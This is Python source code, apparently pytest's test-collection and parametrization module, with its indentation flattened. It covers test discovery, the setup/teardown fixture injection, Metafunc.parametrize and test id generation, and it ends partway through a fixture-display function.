def pyobj_property(name):
def get(self):
node = self.getparent(getattr(__import__("pytest"), name))
if node is not None:
return node.obj
doc = "python {} object this node was collected from (can be None).".format(
name.lower()
)
return property(get, None, None, doc)
def pytest_addoption(parser):
group = parser.getgroup("general")
group.addoption(
"--fixtures",
"--funcargs",
action="store_true",
dest="showfixtures",
default=False,
help="show available fixtures, sorted by plugin appearance "
"(fixtures with leading '_' are only shown with '-v')",
)
group.addoption(
"--fixtures-per-test",
action="store_true",
dest="show_fixtures_per_test",
default=False,
help="show fixtures per test",
)
parser.addini(
"python_files",
type="args",
# NOTE: default is also used in AssertionRewritingHook.
default=["test_*.py", "*_test.py"],
help="glob-style file patterns for Python test module discovery",
)
parser.addini(
"python_classes",
type="args",
default=["Test"],
help="prefixes or glob names for Python test class discovery",
)
parser.addini(
"python_functions",
type="args",
default=["test"],
help="prefixes or glob names for Python test function and method discovery",
)
parser.addini(
"disable_test_id_escaping_and_forfeit_all_rights_to_community_support",
type="bool",
default=False,
help="disable string escape non-ascii characters, might cause unwanted "
"side effects(use at your own risk)",
)
group.addoption(
"--import-mode",
default="prepend",
choices=["prepend", "append"],
dest="importmode",
help="prepend/append to sys.path when importing test modules, "
"default is to prepend.",
)
def pytest_cmdline_main(config):
if config.option.showfixtures:
showfixtures(config)
return 0
if config.option.show_fixtures_per_test:
show_fixtures_per_test(config)
return 0
def _validate_parametrize_spelling(metafunc):
"""Raise a specific error for common misspellings of "parametrize"."""
for mark_name in ["parameterize", "parametrise", "parameterise"]:
if metafunc.definition.get_closest_marker(mark_name):
msg = "{0} has '{1}' mark, spelling should be 'parametrize'"
fail(msg.format(metafunc.function.__name__, mark_name), pytrace=False)
def pytest_generate_tests(metafunc):
_validate_parametrize_spelling(metafunc)
for marker in metafunc.definition.iter_markers(name="parametrize"):
metafunc.parametrize(*marker.args, **marker.kwargs)
def pytest_configure(config):
config.addinivalue_line(
"markers",
"parametrize(argnames, argvalues): call a test function multiple "
"times passing in different arguments in turn. argvalues generally "
"needs to be a list of values if argnames specifies only one name "
"or a list of tuples of values if argnames specifies multiple names. "
"Example: @parametrize('arg1', [1,2]) would lead to two calls of the "
"decorated test function, one with arg1=1 and another with arg1=2."
"see https://docs.pytest.org/en/latest/parametrize.html for more info "
"and examples.",
)
config.addinivalue_line(
"markers",
"usefixtures(fixturename1, fixturename2, ...): mark tests as needing "
"all of the specified fixtures. see "
"https://docs.pytest.org/en/latest/fixture.html#usefixtures ",
)
@hookimpl(trylast=True)
def pytest_pyfunc_call(pyfuncitem):
def async_warn():
msg = "async def functions are not natively supported and have been skipped.\n"
msg += "You need to install a suitable plugin for your async framework, for example:\n"
msg += " - pytest-asyncio\n"
msg += " - pytest-trio\n"
msg += " - pytest-tornasync"
warnings.warn(PytestUnhandledCoroutineWarning(msg.format(pyfuncitem.nodeid)))
skip(msg="async def function and no async plugin installed (see warnings)")
testfunction = pyfuncitem.obj
if iscoroutinefunction(testfunction) or (
sys.version_info >= (3, 6) and inspect.isasyncgenfunction(testfunction)
):
async_warn()
funcargs = pyfuncitem.funcargs
testargs = {arg: funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames}
result = testfunction(**testargs)
if hasattr(result, "__await__") or hasattr(result, "__aiter__"):
async_warn()
return True
def pytest_collect_file(path, parent):
ext = path.ext
if ext == ".py":
if not parent.session.isinitpath(path):
if not path_matches_patterns(
path, parent.config.getini("python_files") + ["__init__.py"]
):
return
ihook = parent.session.gethookproxy(path)
return ihook.pytest_pycollect_makemodule(path=path, parent=parent)
def path_matches_patterns(path, patterns):
"""Returns True if the given py.path.local matches one of the patterns in the list of globs given"""
return any(path.fnmatch(pattern) for pattern in patterns)
def pytest_pycollect_makemodule(path, parent):
if path.basename == "__init__.py":
return Package(path, parent)
return Module(path, parent)
@hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem(collector, name, obj):
outcome = yield
res = outcome.get_result()
if res is not None:
return
# nothing was collected elsewhere, let's do it here
if safe_isclass(obj):
if collector.istestclass(obj, name):
outcome.force_result(Class(name, parent=collector))
elif collector.istestfunction(obj, name):
# mock seems to store unbound methods (issue473), normalize it
obj = getattr(obj, "__func__", obj)
# We need to try and unwrap the function if it's a functools.partial
# or a functools.wrapped.
# We mustn't if it's been wrapped with mock.patch (python 2 only)
if not (inspect.isfunction(obj) or inspect.isfunction(get_real_func(obj))):
filename, lineno = getfslineno(obj)
warnings.warn_explicit(
message=PytestCollectionWarning(
"cannot collect %r because it is not a function." % name
),
category=None,
filename=str(filename),
lineno=lineno + 1,
)
elif getattr(obj, "__test__", True):
if is_generator(obj):
res = Function(name, parent=collector)
reason = "yield tests were removed in pytest 4.0 - {name} will be ignored".format(
name=name
)
res.add_marker(MARK_GEN.xfail(run=False, reason=reason))
res.warn(PytestCollectionWarning(reason))
else:
res = list(collector._genfunctions(name, obj))
outcome.force_result(res)
def pytest_make_parametrize_id(config, val, argname=None):
return None
class PyobjContext:
module = pyobj_property("Module")
cls = pyobj_property("Class")
instance = pyobj_property("Instance")
class PyobjMixin(PyobjContext):
_ALLOW_MARKERS = True
@property
def obj(self):
"""Underlying Python object."""
obj = getattr(self, "_obj", None)
if obj is None:
self._obj = obj = self._getobj()
# XXX evil hack
# used to avoid Instance collector marker duplication
if self._ALLOW_MARKERS:
self.own_markers.extend(get_unpacked_marks(self.obj))
return obj
@obj.setter
def obj(self, value):
self._obj = value
def _getobj(self):
"""Gets the underlying Python object. May be overwritten by subclasses."""
return getattr(self.parent.obj, self.name)
def getmodpath(self, stopatmodule=True, includemodule=False):
""" return python path relative to the containing module. """
chain = self.listchain()
chain.reverse()
parts = []
for node in chain:
if isinstance(node, Instance):
continue
name = node.name
if isinstance(node, Module):
name = os.path.splitext(name)[0]
if stopatmodule:
if includemodule:
parts.append(name)
break
parts.append(name)
parts.reverse()
s = ".".join(parts)
return s.replace(".[", "[")
def reportinfo(self) -> Tuple[str, int, str]:
# XXX caching?
obj = self.obj
compat_co_firstlineno = getattr(obj, "compat_co_firstlineno", None)
if isinstance(compat_co_firstlineno, int):
# nose compatibility
fspath = sys.modules[obj.__module__].__file__
if fspath.endswith(".pyc"):
fspath = fspath[:-1]
lineno = compat_co_firstlineno
else:
fspath, lineno = getfslineno(obj)
modpath = self.getmodpath()
assert isinstance(lineno, int)
return fspath, lineno, modpath
class PyCollector(PyobjMixin, nodes.Collector):
def funcnamefilter(self, name):
return self._matches_prefix_or_glob_option("python_functions", name)
def isnosetest(self, obj):
""" Look for the __test__ attribute, which is applied by the
@nose.tools.istest decorator
"""
# We explicitly check for "is True" here to not mistakenly treat
# classes with a custom __getattr__ returning something truthy (like a
# function) as test classes.
return safe_getattr(obj, "__test__", False) is True
def classnamefilter(self, name):
return self._matches_prefix_or_glob_option("python_classes", name)
def istestfunction(self, obj, name):
if self.funcnamefilter(name) or self.isnosetest(obj):
if isinstance(obj, staticmethod):
# static methods need to be unwrapped
obj = safe_getattr(obj, "__func__", False)
return (
safe_getattr(obj, "__call__", False)
and fixtures.getfixturemarker(obj) is None
)
else:
return False
def istestclass(self, obj, name):
return self.classnamefilter(name) or self.isnosetest(obj)
def _matches_prefix_or_glob_option(self, option_name, name):
"""
checks if the given name matches the prefix or glob-pattern defined
in ini configuration.
"""
for option in self.config.getini(option_name):
if name.startswith(option):
return True
# check that name looks like a glob-string before calling fnmatch
# because this is called for every name in each collected module,
# and fnmatch is somewhat expensive to call
elif ("*" in option or "?" in option or "[" in option) and fnmatch.fnmatch(
name, option
):
return True
return False
def collect(self):
if not getattr(self.obj, "__test__", True):
return []
# NB. we avoid random getattrs and peek in the __dict__ instead
# (XXX originally introduced from a PyPy need, still true?)
dicts = [getattr(self.obj, "__dict__", {})]
for basecls in inspect.getmro(self.obj.__class__):
dicts.append(basecls.__dict__)
seen = {}
values = []
for dic in dicts:
for name, obj in list(dic.items()):
if name in seen:
continue
seen[name] = True
res = self._makeitem(name, obj)
if res is None:
continue
if not isinstance(res, list):
res = [res]
values.extend(res)
values.sort(key=lambda item: item.reportinfo()[:2])
return values
def _makeitem(self, name, obj):
# assert self.ihook.fspath == self.fspath, self
return self.ihook.pytest_pycollect_makeitem(collector=self, name=name, obj=obj)
def _genfunctions(self, name, funcobj):
module = self.getparent(Module).obj
clscol = self.getparent(Class)
cls = clscol and clscol.obj or None
fm = self.session._fixturemanager
definition = FunctionDefinition(name=name, parent=self, callobj=funcobj)
fixtureinfo = fm.getfixtureinfo(definition, funcobj, cls)
metafunc = Metafunc(
definition, fixtureinfo, self.config, cls=cls, module=module
)
methods = []
if hasattr(module, "pytest_generate_tests"):
methods.append(module.pytest_generate_tests)
if hasattr(cls, "pytest_generate_tests"):
methods.append(cls().pytest_generate_tests)
self.ihook.pytest_generate_tests.call_extra(methods, dict(metafunc=metafunc))
if not metafunc._calls:
yield Function(name, parent=self, fixtureinfo=fixtureinfo)
else:
# add funcargs() as fixturedefs to fixtureinfo.arg2fixturedefs
fixtures.add_funcarg_pseudo_fixture_def(self, metafunc, fm)
# add_funcarg_pseudo_fixture_def may have shadowed some fixtures
# with direct parametrization, so make sure we update what the
# function really needs.
fixtureinfo.prune_dependency_tree()
for callspec in metafunc._calls:
subname = "{}[{}]".format(name, callspec.id)
yield Function(
name=subname,
parent=self,
callspec=callspec,
callobj=funcobj,
fixtureinfo=fixtureinfo,
keywords={callspec.id: True},
originalname=name,
)
class Module(nodes.File, PyCollector):
""" Collector for test classes and functions. """
def _getobj(self):
return self._importtestmodule()
def collect(self):
self._inject_setup_module_fixture()
self._inject_setup_function_fixture()
self.session._fixturemanager.parsefactories(self)
return super().collect()
def _inject_setup_module_fixture(self):
"""Injects a hidden autouse, module scoped fixture into the collected module object
that invokes setUpModule/tearDownModule if either or both are available.
Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
other fixtures (#517).
"""
setup_module = _get_first_non_fixture_func(
self.obj, ("setUpModule", "setup_module")
)
teardown_module = _get_first_non_fixture_func(
self.obj, ("tearDownModule", "teardown_module")
)
if setup_module is None and teardown_module is None:
return
@fixtures.fixture(autouse=True, scope="module")
def xunit_setup_module_fixture(request):
if setup_module is not None:
_call_with_optional_argument(setup_module, request.module)
yield
if teardown_module is not None:
_call_with_optional_argument(teardown_module, request.module)
self.obj.__pytest_setup_module = xunit_setup_module_fixture
def _inject_setup_function_fixture(self):
"""Injects a hidden autouse, function scoped fixture into the collected module object
that invokes setup_function/teardown_function if either or both are available.
Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
other fixtures (#517).
"""
setup_function = _get_first_non_fixture_func(self.obj, ("setup_function",))
teardown_function = _get_first_non_fixture_func(
self.obj, ("teardown_function",)
)
if setup_function is None and teardown_function is None:
return
@fixtures.fixture(autouse=True, scope="function")
def xunit_setup_function_fixture(request):
if request.instance is not None:
# in this case we are bound to an instance, so we need to let
# setup_method handle this
yield
return
if setup_function is not None:
_call_with_optional_argument(setup_function, request.function)
yield
if teardown_function is not None:
_call_with_optional_argument(teardown_function, request.function)
self.obj.__pytest_setup_function = xunit_setup_function_fixture
def _importtestmodule(self):
# we assume we are only called once per module
importmode = self.config.getoption("--import-mode")
try:
mod = self.fspath.pyimport(ensuresyspath=importmode)
except SyntaxError:
raise self.CollectError(
_pytest._code.ExceptionInfo.from_current().getrepr(style="short")
)
except self.fspath.ImportMismatchError:
e = sys.exc_info()[1]
raise self.CollectError(
"import file mismatch:\n"
"imported module %r has this __file__ attribute:\n"
" %s\n"
"which is not the same as the test file we want to collect:\n"
" %s\n"
"HINT: remove __pycache__ / .pyc files and/or use a "
"unique basename for your test file modules" % e.args
)
except ImportError:
from _pytest._code.code import ExceptionInfo
exc_info = ExceptionInfo.from_current()
if self.config.getoption("verbose") < 2:
exc_info.traceback = exc_info.traceback.filter(filter_traceback)
exc_repr = (
exc_info.getrepr(style="short")
if exc_info.traceback
else exc_info.exconly()
)
formatted_tb = str(exc_repr)
raise self.CollectError(
"ImportError while importing test module '{fspath}'.\n"
"Hint: make sure your test modules/packages have valid Python names.\n"
"Traceback:\n"
"{traceback}".format(fspath=self.fspath, traceback=formatted_tb)
)
except _pytest.runner.Skipped as e:
if e.allow_module_level:
raise
raise self.CollectError(
"Using pytest.skip outside of a test is not allowed. "
"To decorate a test function, use the @pytest.mark.skip "
"or @pytest.mark.skipif decorators instead, and to skip a "
"module use `pytestmark = pytest.mark.{skip,skipif}."
)
self.config.pluginmanager.consider_module(mod)
return mod
class Package(Module):
def __init__(self, fspath, parent=None, config=None, session=None, nodeid=None):
session = parent.session
nodes.FSCollector.__init__(
self, fspath, parent=parent, config=config, session=session, nodeid=nodeid
)
self.name = fspath.dirname
self.trace = session.trace
self._norecursepatterns = session._norecursepatterns
self.fspath = fspath
def setup(self):
# not using fixtures to call setup_module here because autouse fixtures
# from packages are not called automatically (#4085)
setup_module = _get_first_non_fixture_func(
self.obj, ("setUpModule", "setup_module")
)
if setup_module is not None:
_call_with_optional_argument(setup_module, self.obj)
teardown_module = _get_first_non_fixture_func(
self.obj, ("tearDownModule", "teardown_module")
)
if teardown_module is not None:
func = partial(_call_with_optional_argument, teardown_module, self.obj)
self.addfinalizer(func)
def _recurse(self, dirpath):
if dirpath.basename == "__pycache__":
return False
ihook = self.gethookproxy(dirpath.dirpath())
if ihook.pytest_ignore_collect(path=dirpath, config=self.config):
return
for pat in self._norecursepatterns:
if dirpath.check(fnmatch=pat):
return False
ihook = self.gethookproxy(dirpath)
ihook.pytest_collect_directory(path=dirpath, parent=self)
return True
def gethookproxy(self, fspath):
# check if we have the common case of running
# hooks with all conftest.py filesall conftest.py
pm = self.config.pluginmanager
my_conftestmodules = pm._getconftestmodules(fspath)
remove_mods = pm._conftest_plugins.difference(my_conftestmodules)
if remove_mods:
# one or more conftests are not in use at this fspath
proxy = FSHookProxy(fspath, pm, remove_mods)
else:
# all plugins are active for this fspath
proxy = self.config.hook
return proxy
def _collectfile(self, path, handle_dupes=True):
assert (
path.isfile()
), "{!r} is not a file (isdir={!r}, exists={!r}, islink={!r})".format(
path, path.isdir(), path.exists(), path.islink()
)
ihook = self.gethookproxy(path)
if not self.isinitpath(path):
if ihook.pytest_ignore_collect(path=path, config=self.config):
return ()
if handle_dupes:
keepduplicates = self.config.getoption("keepduplicates")
if not keepduplicates:
duplicate_paths = self.config.pluginmanager._duplicatepaths
if path in duplicate_paths:
return ()
else:
duplicate_paths.add(path)
if self.fspath == path: # __init__.py
return [self]
return ihook.pytest_collect_file(path=path, parent=self)
def isinitpath(self, path):
return path in self.session._initialpaths
def collect(self):
this_path = self.fspath.dirpath()
init_module = this_path.join("__init__.py")
if init_module.check(file=1) and path_matches_patterns(
init_module, self.config.getini("python_files")
):
yield Module(init_module, self)
pkg_prefixes = set()
for path in this_path.visit(rec=self._recurse, bf=True, sort=True):
# We will visit our own __init__.py file, in which case we skip it.
is_file = path.isfile()
if is_file:
if path.basename == "__init__.py" and path.dirpath() == this_path:
continue
parts_ = parts(path.strpath)
if any(
pkg_prefix in parts_ and pkg_prefix.join("__init__.py") != path
for pkg_prefix in pkg_prefixes
):
continue
if is_file:
yield from self._collectfile(path)
elif not path.isdir():
# Broken symlink or invalid/missing file.
continue
elif path.join("__init__.py").check(file=1):
pkg_prefixes.add(path)
def _call_with_optional_argument(func, arg):
"""Call the given function with the given argument if func accepts one argument, otherwise
calls func without arguments"""
arg_count = func.__code__.co_argcount
if inspect.ismethod(func):
arg_count -= 1
if arg_count:
func(arg)
else:
func()
def _get_first_non_fixture_func(obj, names):
"""Return the attribute from the given object to be used as a setup/teardown
xunit-style function, but only if not marked as a fixture to
avoid calling it twice.
"""
for name in names:
meth = getattr(obj, name, None)
if meth is not None and fixtures.getfixturemarker(meth) is None:
return meth
class Class(PyCollector):
""" Collector for test methods. """
def collect(self):
if not safe_getattr(self.obj, "__test__", True):
return []
if hasinit(self.obj):
self.warn(
PytestCollectionWarning(
"cannot collect test class %r because it has a "
"__init__ constructor (from: %s)"
% (self.obj.__name__, self.parent.nodeid)
)
)
return []
elif hasnew(self.obj):
self.warn(
PytestCollectionWarning(
"cannot collect test class %r because it has a "
"__new__ constructor (from: %s)"
% (self.obj.__name__, self.parent.nodeid)
)
)
return []
self._inject_setup_class_fixture()
self._inject_setup_method_fixture()
return [Instance(name="()", parent=self)]
def _inject_setup_class_fixture(self):
"""Injects a hidden autouse, class scoped fixture into the collected class object
that invokes setup_class/teardown_class if either or both are available.
Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
other fixtures (#517).
"""
setup_class = _get_first_non_fixture_func(self.obj, ("setup_class",))
teardown_class = getattr(self.obj, "teardown_class", None)
if setup_class is None and teardown_class is None:
return
@fixtures.fixture(autouse=True, scope="class")
def xunit_setup_class_fixture(cls):
if setup_class is not None:
func = getimfunc(setup_class)
_call_with_optional_argument(func, self.obj)
yield
if teardown_class is not None:
func = getimfunc(teardown_class)
_call_with_optional_argument(func, self.obj)
self.obj.__pytest_setup_class = xunit_setup_class_fixture
def _inject_setup_method_fixture(self):
"""Injects a hidden autouse, function scoped fixture into the collected class object
that invokes setup_method/teardown_method if either or both are available.
Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
other fixtures (#517).
"""
setup_method = _get_first_non_fixture_func(self.obj, ("setup_method",))
teardown_method = getattr(self.obj, "teardown_method", None)
if setup_method is None and teardown_method is None:
return
@fixtures.fixture(autouse=True, scope="function")
def xunit_setup_method_fixture(self, request):
method = request.function
if setup_method is not None:
func = getattr(self, "setup_method")
_call_with_optional_argument(func, method)
yield
if teardown_method is not None:
func = getattr(self, "teardown_method")
_call_with_optional_argument(func, method)
self.obj.__pytest_setup_method = xunit_setup_method_fixture
class Instance(PyCollector):
_ALLOW_MARKERS = False # hack, destroy later
# instances share the object with their parents in a way
# that duplicates markers instances if not taken out
# can be removed at node structure reorganization time
def _getobj(self):
return self.parent.obj()
def collect(self):
self.session._fixturemanager.parsefactories(self)
return super().collect()
def newinstance(self):
self.obj = self._getobj()
return self.obj
class FunctionMixin(PyobjMixin):
""" mixin for the code common to Function and Generator.
"""
def setup(self):
""" perform setup for this test function. """
if isinstance(self.parent, Instance):
self.parent.newinstance()
self.obj = self._getobj()
def _prunetraceback(self, excinfo):
if hasattr(self, "_obj") and not self.config.getoption("fulltrace", False):
code = _pytest._code.Code(get_real_func(self.obj))
path, firstlineno = code.path, code.firstlineno
traceback = excinfo.traceback
ntraceback = traceback.cut(path=path, firstlineno=firstlineno)
if ntraceback == traceback:
ntraceback = ntraceback.cut(path=path)
if ntraceback == traceback:
ntraceback = ntraceback.filter(filter_traceback)
if not ntraceback:
ntraceback = traceback
excinfo.traceback = ntraceback.filter()
# issue364: mark all but first and last frames to
# only show a single-line message for each frame
if self.config.getoption("tbstyle", "auto") == "auto":
if len(excinfo.traceback) > 2:
for entry in excinfo.traceback[1:-1]:
entry.set_repr_style("short")
def repr_failure(self, excinfo, outerr=None):
assert outerr is None, "XXX outerr usage is deprecated"
style = self.config.getoption("tbstyle", "auto")
if style == "auto":
style = "long"
return self._repr_failure_py(excinfo, style=style)
def hasinit(obj):
init = getattr(obj, "__init__", None)
if init:
return init != object.__init__
def hasnew(obj):
new = getattr(obj, "__new__", None)
if new:
return new != object.__new__
class CallSpec2:
def __init__(self, metafunc):
self.metafunc = metafunc
self.funcargs = {}
self._idlist = []
self.params = {}
self._globalid = NOTSET
self._globalparam = NOTSET
self._arg2scopenum = {} # used for sorting parametrized resources
self.marks = []
self.indices = {}
def copy(self):
cs = CallSpec2(self.metafunc)
cs.funcargs.update(self.funcargs)
cs.params.update(self.params)
cs.marks.extend(self.marks)
cs.indices.update(self.indices)
cs._arg2scopenum.update(self._arg2scopenum)
cs._idlist = list(self._idlist)
cs._globalid = self._globalid
cs._globalparam = self._globalparam
return cs
def _checkargnotcontained(self, arg):
if arg in self.params or arg in self.funcargs:
raise ValueError("duplicate {!r}".format(arg))
def getparam(self, name):
try:
return self.params[name]
except KeyError:
if self._globalparam is NOTSET:
raise ValueError(name)
return self._globalparam
@property
def id(self):
return "-".join(map(str, filter(None, self._idlist)))
def setmulti2(self, valtypes, argnames, valset, id, marks, scopenum, param_index):
for arg, val in zip(argnames, valset):
self._checkargnotcontained(arg)
valtype_for_arg = valtypes[arg]
getattr(self, valtype_for_arg)[arg] = val
self.indices[arg] = param_index
self._arg2scopenum[arg] = scopenum
self._idlist.append(id)
self.marks.extend(normalize_mark_list(marks))
class Metafunc:
"""
Metafunc objects are passed to the :func:`pytest_generate_tests <_pytest.hookspec.pytest_generate_tests>` hook.
They help to inspect a test function and to generate tests according to
test configuration or values specified in the class or module where a
test function is defined.
"""
def __init__(self, definition, fixtureinfo, config, cls=None, module=None):
assert (
isinstance(definition, FunctionDefinition)
or type(definition).__name__ == "DefinitionMock"
)
self.definition = definition
#: access to the :class:`_pytest.config.Config` object for the test session
self.config = config
#: the module object where the test function is defined in.
self.module = module
#: underlying python test function
self.function = definition.obj
#: set of fixture names required by the test function
self.fixturenames = fixtureinfo.names_closure
#: class object where the test function is defined in or ``None``.
self.cls = cls
self._calls = []
self._ids = set()
self._arg2fixturedefs = fixtureinfo.name2fixturedefs
@property
def funcargnames(self):
""" alias attribute for ``fixturenames`` for pre-2.3 compatibility"""
warnings.warn(FUNCARGNAMES, stacklevel=2)
return self.fixturenames
def parametrize(self, argnames, argvalues, indirect=False, ids=None, scope=None):
""" Add new invocations to the underlying test function using the list
of argvalues for the given argnames. Parametrization is performed
during the collection phase. If you need to setup expensive resources
see about setting indirect to do it rather at test setup time.
:arg argnames: a comma-separated string denoting one or more argument
names, or a list/tuple of argument strings.
:arg argvalues: The list of argvalues determines how often a
test is invoked with different argument values. If only one
argname was specified argvalues is a list of values. If N
argnames were specified, argvalues must be a list of N-tuples,
where each tuple-element specifies a value for its respective
argname.
:arg indirect: The list of argnames or boolean. A list of arguments'
names (subset of argnames). If True the list contains all names from
the argnames. Each argvalue corresponding to an argname in this list will
be passed as request.param to its respective argname fixture
function so that it can perform more expensive setups during the
setup phase of a test rather than at collection time.
:arg ids: list of string ids, or a callable.
If strings, each is corresponding to the argvalues so that they are
part of the test id. If None is given as id of specific test, the
automatically generated id for that argument will be used.
If callable, it should take one argument (a single argvalue) and return
a string or return None. If None, the automatically generated id for that
argument will be used.
If no ids are provided they will be generated automatically from
the argvalues.
:arg scope: if specified it denotes the scope of the parameters.
The scope is used for grouping tests by parameter instances.
It will also override any fixture-function defined scope, allowing
to set a dynamic scope using test context or configuration.
"""
from _pytest.fixtures import scope2index
from _pytest.mark import ParameterSet
argnames, parameters = ParameterSet._for_parametrize(
argnames,
argvalues,
self.function,
self.config,
function_definition=self.definition,
)
del argvalues
if "request" in argnames:
fail(
"'request' is a reserved name and cannot be used in @pytest.mark.parametrize",
pytrace=False,
)
if scope is None:
scope = _find_parametrized_scope(argnames, self._arg2fixturedefs, indirect)
self._validate_if_using_arg_names(argnames, indirect)
arg_values_types = self._resolve_arg_value_types(argnames, indirect)
ids = self._resolve_arg_ids(argnames, ids, parameters, item=self.definition)
scopenum = scope2index(
scope, descr="parametrize() call in {}".format(self.function.__name__)
)
# create the new calls: if we are parametrize() multiple times (by applying the decorator
# more than once) then we accumulate those calls generating the cartesian product
# of all calls
newcalls = []
for callspec in self._calls or [CallSpec2(self)]:
for param_index, (param_id, param_set) in enumerate(zip(ids, parameters)):
newcallspec = callspec.copy()
newcallspec.setmulti2(
arg_values_types,
argnames,
param_set.values,
param_id,
param_set.marks,
scopenum,
param_index,
)
newcalls.append(newcallspec)
self._calls = newcalls
def _resolve_arg_ids(self, argnames, ids, parameters, item):
"""Resolves the actual ids for the given argnames, based on the ``ids`` parameter given
to ``parametrize``.
:param List[str] argnames: list of argument names passed to ``parametrize()``.
:param ids: the ids parameter of the parametrized call (see docs).
:param List[ParameterSet] parameters: the list of parameter values, same size as ``argnames``.
:param Item item: the item that generated this parametrized call.
:rtype: List[str]
:return: the list of ids for each argname given
"""
from _pytest._io.saferepr import saferepr
idfn = None
if callable(ids):
idfn = ids
ids = None
if ids:
func_name = self.function.__name__
if len(ids) != len(parameters):
msg = "In {}: {} parameter sets specified, with different number of ids: {}"
fail(msg.format(func_name, len(parameters), len(ids)), pytrace=False)
for id_value in ids:
if id_value is not None and not isinstance(id_value, str):
msg = "In {}: ids must be list of strings, found: {} (type: {!r})"
fail(
msg.format(func_name, saferepr(id_value), type(id_value)),
pytrace=False,
)
ids = idmaker(argnames, parameters, idfn, ids, self.config, item=item)
return ids
def _resolve_arg_value_types(self, argnames, indirect):
"""Resolves if each parametrized argument must be considered a parameter to a fixture or a "funcarg"
to the function, based on the ``indirect`` parameter of the parametrized() call.
:param List[str] argnames: list of argument names passed to ``parametrize()``.
:param indirect: same ``indirect`` parameter of ``parametrize()``.
:rtype: Dict[str, str]
A dict mapping each arg name to either:
* "params" if the argname should be the parameter of a fixture of the same name.
* "funcargs" if the argname should be a parameter to the parametrized test function.
"""
if isinstance(indirect, bool):
valtypes = dict.fromkeys(argnames, "params" if indirect else "funcargs")
elif isinstance(indirect, Sequence):
valtypes = dict.fromkeys(argnames, "funcargs")
for arg in indirect:
if arg not in argnames:
fail(
"In {}: indirect fixture '{}' doesn't exist".format(
self.function.__name__, arg
),
pytrace=False,
)
valtypes[arg] = "params"
else:
fail(
"In {func}: expected Sequence or boolean for indirect, got {type}".format(
type=type(indirect).__name__, func=self.function.__name__
),
pytrace=False,
)
return valtypes
def _validate_if_using_arg_names(self, argnames, indirect):
"""
Check if all argnames are being used, by default values, or directly/indirectly.
:param List[str] argnames: list of argument names passed to ``parametrize()``.
:param indirect: same ``indirect`` parameter of ``parametrize()``.
:raise ValueError: if validation fails.
"""
default_arg_names = set(get_default_arg_names(self.function))
func_name = self.function.__name__
for arg in argnames:
if arg not in self.fixturenames:
if arg in default_arg_names:
fail(
"In {}: function already takes an argument '{}' with a default value".format(
func_name, arg
),
pytrace=False,
)
else:
if isinstance(indirect, (tuple, list)):
name = "fixture" if arg in indirect else "argument"
else:
name = "fixture" if indirect else "argument"
fail(
"In {}: function uses no {} '{}'".format(func_name, name, arg),
pytrace=False,
)
def _find_parametrized_scope(argnames, arg2fixturedefs, indirect):
"""Find the most appropriate scope for a parametrized call based on its arguments.
When there's at least one direct argument, always use "function" scope.
When a test function is parametrized and all its arguments are indirect
(e.g. fixtures), return the most narrow scope based on the fixtures used.
Related to issue #1832, based on code posted by @Kingdread.
"""
from _pytest.fixtures import scopes
if isinstance(indirect, (list, tuple)):
all_arguments_are_fixtures = len(indirect) == len(argnames)
else:
all_arguments_are_fixtures = bool(indirect)
if all_arguments_are_fixtures:
fixturedefs = arg2fixturedefs or {}
used_scopes = [
fixturedef[0].scope
for name, fixturedef in fixturedefs.items()
if name in argnames
]
if used_scopes:
# Takes the most narrow scope from used fixtures
for scope in reversed(scopes):
if scope in used_scopes:
return scope
return "function"
def _ascii_escaped_by_config(val, config):
if config is None:
escape_option = False
else:
escape_option = config.getini(
"disable_test_id_escaping_and_forfeit_all_rights_to_community_support"
)
return val if escape_option else ascii_escaped(val)
def _idval(val, argname, idx, idfn, item, config):
if idfn:
try:
generated_id = idfn(val)
if generated_id is not None:
val = generated_id
except Exception as e:
# See issue https://github.com/pytest-dev/pytest/issues/2169
msg = "{}: error raised while trying to determine id of parameter '{}' at position {}\n"
msg = msg.format(item.nodeid, argname, idx)
raise ValueError(msg) from e
elif config:
hook_id = config.hook.pytest_make_parametrize_id(
config=config, val=val, argname=argname
)
if hook_id:
return hook_id
if isinstance(val, STRING_TYPES):
return _ascii_escaped_by_config(val, config)
elif val is None or isinstance(val, (float, int, bool)):
return str(val)
elif isinstance(val, REGEX_TYPE):
return ascii_escaped(val.pattern)
elif isinstance(val, enum.Enum):
return str(val)
elif hasattr(val, "__name__") and isinstance(val.__name__, str):
# name of a class, function, module, etc.
return val.__name__
return str(argname) + str(idx)
def _idvalset(idx, parameterset, argnames, idfn, ids, item, config):
if parameterset.id is not None:
return parameterset.id
if ids is None or (idx >= len(ids) or ids[idx] is None):
this_id = [
_idval(val, argname, idx, idfn, item=item, config=config)
for val, argname in zip(parameterset.values, argnames)
]
return "-".join(this_id)
else:
return _ascii_escaped_by_config(ids[idx], config)
def idmaker(argnames, parametersets, idfn=None, ids=None, config=None, item=None):
ids = [
_idvalset(valindex, parameterset, argnames, idfn, ids, config=config, item=item)
for valindex, parameterset in enumerate(parametersets)
]
if len(set(ids)) != len(ids):
# The ids are not unique
duplicates = [testid for testid in ids if ids.count(testid) > 1]
counters = Counter()
for index, testid in enumerate(ids):
if testid in duplicates:
ids[index] = testid + str(counters[testid])
counters[testid] += 1
return ids
def show_fixtures_per_test(config):
from _pytest.main import wrap_session
return wrap_session(config, _show_fixtures_per_test)
def _show_fixtures_per_test(config, session):
import _pytest.config
session.perform_collect()
curdir = py.path.local()
tw = _pytest.config.create_terminal_writer(config)
verbose = config.getvalue("verbose")
def get_best_relpath(func):
loc = getlocation(func, curdir)
return curdir.bestrelpath(loc)
def write_fixture(fixture_def):
argname = fixture_def.argname
if verbose <= 0 and argname.startswith("_"):
return
if verbose > 0:
bestrel = get_best_relpath(fixture_def.func)
funcargspec = "{} -- {}".format(argname, bestrel)
else:
funcargspec = argname
tw.line(funcargspec, green=True)
fixture_doc = fixture_def.func.__doc__
if fixture_doc:
write_docstring(tw, fixture_doc)
else:
tw.line(" no docstring available", red=True)
def write_item(item):
try:
info = item._fixtureinfo
except AttributeError:
# doctests items have no _fixtureinfo attribute
return
if not info.name2fixturedefs:
# this test item does not use any fixtures
return
tw.line()
tw.sep("-", "fixtures used by {}".format(item.name))
tw.sep("-", "({})".format(get_best_relpath(item.function)))
# dict key not used in loop but needed for sorting
for _, fixturedefs in sorted(info.name2fixturedefs.items()):
